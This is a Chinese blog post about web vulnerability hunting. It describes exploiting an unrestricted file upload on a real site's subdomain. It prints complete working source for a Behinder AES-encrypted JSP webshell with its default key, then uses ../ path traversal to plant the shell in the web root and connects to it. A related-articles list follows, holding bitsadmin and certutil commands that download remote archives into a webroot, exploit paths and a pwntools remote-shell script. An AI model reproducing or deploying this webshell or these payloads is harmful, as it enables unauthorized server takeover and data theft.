任意文件上传漏洞挖掘(getshell)

最新推荐文章于 2025-02-24 15:59:20 发布
最新推荐文章于 2025-02-24 15:59:20 发布
阅读量534 收藏 4
点赞数
分类专栏: 漏洞挖掘 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/huangyongkang666/article/details/134653186
版权

任意文件上传漏洞挖掘(getshell)

1.在漏洞挖掘过程中进行找到该子域名页面,

在这里插入图片描述

2.没有内容就扫目录,成功发现filemanager/,点击访问

在这里插入图片描述

看到upload页面感觉有惊喜,

在这里插入图片描述

果然有上传功能,点击上传抓包,经测试发现普通jsp会被拦截,蚁剑连不上,所以选择冰蝎马上传,因为冰蝎马默认AES加密

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*" %>
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }

        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
%><%
    if (request.getMethod().equals("POST")) {
        String k = "e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/
        session.putValue("u", k);
        Cipher c = Cipher.getInstance("AES");
        c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
        new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);
    }
%>

在这里插入图片描述

但是没有路径回显,看到path,于是尝试…/上传

在这里插入图片描述

可以看到有路径,在尝试…/…/后

在这里插入图片描述

访问后发现正好是网站根路径

直接尝试冰蝎连接,连接成功

在这里插入图片描述

在这里插入图片描述

至此,成功gethell

当然也可以上传svg,html文件形成存储型XSS,经测试都是可以的,这里完全对上传文件没有限制。

漏洞挖掘】——75、任意文件读取攻防原理
Fly_鹏程万里
06-11 369
web安全任意文件读取漏洞是非常常见的一种漏洞,属于文件操作类漏洞,一般常见于PHP/java/python语言中,任意文件读取漏洞,顾名思义就是可以任意读取服务器上部分或者全部文件的漏洞,攻击者利用此漏洞可以读取服务器敏感文件如/etc/passwd,/etc/sadow,web.config等,漏洞一般存在于文件下载参数,文件包含参数,主要是由于程序对传入的文件名或者文件路径没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露。
某数字化校园系统通用型文件上传漏洞getshell(渗透测试-0day)
afei001
03-18 1335
目录 1.前言 2.文件上传点(实战复现) 3.提交SRC 4.getshell POC 声明: 仅用于渗透测试,白帽漏洞挖掘。请勿用做非法用途,非法使用造成后果自负。 1.前言 偶然在F12sec上看到一边文章,于是有了今天的挖洞过程。某位白帽子师傅发现某建站系统通用型漏洞,属于0day哦。不过这个0day漏洞也够无语的... 直接无任何限制可上传aspx可执行文件,并且漏洞点就在注册页面。这漏洞挖掘也是站在巨人“PeiQi”师傅的肩膀上挖到的。 ...
php审计--任意文件上传配合目录文件包含getshell
qq_29437513的博客
08-10 594
在黑盒中 源码 数据库配置文件都是很不好找的,,但源码审计不同 所有的漏洞,成因都是相同的,但我们自以最基础的作为代表, 这里文件上传这个点可以配合文件包含一块利用,当某个站对数据处理不严时,存在sql注入,那也可能会有文件注入, 常见的文件目录穿越配合文件包含实现getshell 演示目录穿越的原理,这里通过readfile函数读取文件,注意file变量里有个正斜杆 <?php if(isset($_GET['file'])){ readfile("file/".$_GET['file'])
任意文件上传getshell
Websec
03-21 8904
漏洞描述:任意文件上传顾名思义就是在文件上传的地方能够上传任意类型的文件,我们可以上传恶意木马文件对其服务器进行攻击。漏洞寻找:通过查看文件上传的地方,通过burpsuite抓包分析其上传点对其文件类型是否做了限制,也可能只是做了前端限制,但是这个都不要紧,直接绕过就行漏洞修复建议:1.文件上传的地方,我们需要对其文件格式做白名单限制,只允许我们需要的文件进行上传即可2.对文件格式进行校验,前端以...
php代码审计-OurPhp 后台任意文件上传getshell
weixin_44747030的博客
10-27 600
OurPhp代码审计
PHPYUN任意文件上传导致GETSHELL
_404root的博客
02-28 1928
简要描述: 简单到你难以想象,只要网站还可以注册就可以GETSHELL,无视GPC,无视WAF。4.1beta版本,其他版本未测 详细说明: 1.在审计PHPYUN的时候一度对PHPYUN的WAF非常无语,但是在大家都痴迷于寻找SQL注入漏洞的时候,确实忽略了一个很简单的上传漏洞。首先定位到漏洞文件wap/member/model/index.class.php function photo_ac...
漏洞学习——任意文件上传】四川外国语大学某分站任意文件上传导致getshell
Fly_鹏程万里
02-22 728
漏洞细节 fck编辑器存在地址:http://**.**.**.**:8080/include/fckeditor/editor/filemanager/upload/test.html 上传文件时可在文件名后加空格进行绕过上传 getshell 修复建议:增加白名单检测绕过 参见:https://bugs.shuimugan.com/bug/view?bug_no=15406...
#渗透测试#批量漏洞挖掘#飞企互联-FE企业运营管理平台 uploadAttachmentServlet—文件上传漏洞(CNVD-2023-12567)
soc的博客
02-24 728
企互联-FE企业运营管理平台是一个利用云计算、人工智能、大数据、物联网和移动互联网等现代技术构建的云工作台。然而,该平台的uploadAttachmentServlet接口存在文件上传漏洞,这使得恶意攻击者有可能上传有害的后门程序或木马。这种攻击可能使得攻击者获得对服务器的远程访问权限,或者对系统造成破坏,给服务器带来严重的安全威胁。
任意文件下载漏洞
L_lemo004的博客
09-22 4779
文章目录任意文件下载0x01 漏洞介绍0x02 漏洞产生原因0x03 漏洞发现Google search一般链接形式包含参数利用方法WEB-INF0x04 漏洞绕过0x05 漏洞利用常见利用文件路径WindowsLinux0x06 漏洞判断0x07 漏洞验证0x08 漏洞防护通用文件下载漏洞修复0x09 文件路径汇总任意文件读取漏洞漏洞产生原因任意文件读取文件读取函数漏洞验证任意文件读取验证 任意文件下载 0x01 漏洞介绍 一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户
【网络安全】测试文件上传漏洞的 5 种高级方法
等风来
08-26 1961
深入了解文件上传漏洞后,我们可以实现严重性影响,即使它不是 webshell RCE,它仍然可以通过其他方式损害服务器:读取文件(curl_exec)、XXE、XSS 和覆盖现有文件。
windows系统getshell上传文件
arr的博客
05-29 277
bitsadmin /transfer myDownloadJob /download /priority normal https://xxx.com/temp.zip C:\xxx\wwwroot\xxx\xxx\inst\temp\temp.zipcertutil -urlcache -split -f https://xxx.com/html.zip C:\xxx\wwwroot\xxx\xxx\xxx\acticle\temp.ziptar -xf C:\xxx\wwwroot\xxx\xxx\i
FHAdmin任意文件上传getShell渗透测试
kelenwait的博客
06-25 2155
简介 FHAdmin于2014年发布,由JAVA语言编写,是集成了代码生成、权限管理等基础功能的Java快速开发框架及平台,同时为适应技术的更新的迭代,也推出了更新框架和技术架构后的版本。 漏洞复现 任意文件上传 /;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ 存在任意文件上传。 poc POST //;a/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploa
某教程学习笔记(一):19、任意文件上传和sql语句拿shell
Web安全工具库
03-08 460
毕业时,门卫大爷收走了那辆自行车,问我都那么破了,还拍照干什么,他哪里知道后座上曾坐过陪了我四年的姑娘。。。 ---- 网易云热评 一、任意上传文件拿shell 1、注册账号 2、上传头像 3、上传任意文件,抓包分析 将tx后面的内容修改为tx=data%3Aimage%2Fphp%3Bbase64%2CPD9waHANCiBwaHBpbmZvKCk7IA0KPz4%3D 解密收的内容为:...
基于文件上传漏洞获得网站 shell 权限
m0_58001548的博客
04-19 2266
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的 webshell 权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx 等都曝出过文件上传漏洞
任意文件上传
来日可期的博客
08-29 4446
任意文件上传漏洞(Arbitrary File Upload Vulnerability)是指攻击者通过某种方式绕过服务器端对上传文件类型和路径的合法性检查,成功地上传恶意文件到目标服务器上,并执行其中的恶意代码。这种漏洞广泛存在于许多Web应用程序中,特别是那些允许用户上传文件的网站或Web应用。
记两次非常规文件上传Getshell
江左盟的博客
08-09 607
常规绕过前端和后端的任意文件上传已经没意思了,本文记录下之前和最近遇到的2个不太常规的任意文件上传Getshell的案例。
Joomla远程上传漏洞 可直接getshell
fengling132的专栏
08-15 2777
作者:1337   1.  有些joomal需要先注册.   http://site/index.php?option=com_user&view=login   2.  到上传地址   http://www.2cto.com /index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en   3.
文件上传漏洞实战getshell分析 形成 利用 修复
weixin_74245209的博客
12-20 1368
文件上传漏洞是指用户上传了一个可执行的脚本文件(php、jsp、xml、cer等文件),而WEB系统没有进行检测或逻辑做的不够安全。文件上传功能本身没有问题,问题在于上传后如何处理及解释文件。一般情况下,Web应用都会允许用户上传一些文件,如头像、附件等信息,如果Web应用没有对用户上传的文件进行有效的检查过滤,那么恶意用户就会上传一句话木马等Webshell,从而达到控制Web网站的目的。提示:以下是本篇文章正文内容,下面案例可供参考。webshell getshell
利用DVWA演示文件上传漏洞获取网站shell权限(二)
weixin_43822401的博客
06-12 638
文件上传漏洞是网络安全中常见的一种漏洞类型,攻击者可以利用该漏洞上传恶意文件到服务器上,从而获得对网站的远程控制权限。本文将以DVWA (Damn Vulnerable Web Application) 为例,演示如何利用文件上传漏洞的Medium级别设置,绕过文件类型限制,获得网站的shell权限。
PolarCTF getshell
最新发布
03-20
### 关于 PolarCTF 中获取 Shell 的方法与技巧 在 CTF 比赛中,尤其是像 PolarCTF 这样的赛事,获取远程 shell 是一项常见的目标。以下是几种可能的方法和技术: #### 1. 利用已知漏洞 如果题目提供了特定的服务或者程序,可以通过挖掘其中的安全漏洞来实现远程代码执行 (RCE),从而获得 shell。例如,在某些情况下,可能存在缓冲区溢出、命令注入或其他类型的漏洞[^1]。 ```python from pwn import * def exploit(): # 假设这是一个基于网络服务的 PWN 题目 target_ip = "example.com" port = 9999 # 创建连接对象 conn = remote(target_ip, port) # 发送恶意负载以触发 RCE 并返回 shell payload = b"A"*1024 + b"\x31\xc0\x50..." conn.send(payload) # 将交互切换至手动控制模式 conn.interactive() if __name__ == "__main__": exploit() ``` 上述代码片段展示了一个简单的 Python 脚本如何通过 `pwntools` 库发送自定义数据包给目标服务器并尝试获取交互式 shell[^3]。 #### 2. 文件上传/下载机制滥用 当面对具有文件操作功能的应用时,应仔细审查其安全性设计是否存在缺陷。比如允许用户上传任意类型文件而未做严格校验,则可借此植入 webshell 或者其他形式的有效载荷;又或者是存在任意文件读取漏洞的情况下,能够窃取配置文件进而找到更多突破口[^5]。 #### 3. 社会工程学手段配合技术实施 虽然这并不适用于所有场景下的正式竞赛环节里,但在模拟真实世界攻击面的时候不可忽视人为因素的影响——即所谓的社会工程学攻击方式可能会间接辅助完成最终目的[^2]。 #### 4. 学习资源推荐 对于希望进一步提高自己在这方面的技能水平的人来说,《超1800页CTF实战技巧手册》以及《最新网安大厂面试题合集(含答案)》都是非常宝贵的参考资料。同时也要注意构建完整的知识框架以便更好地理解和解决复杂问题[^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值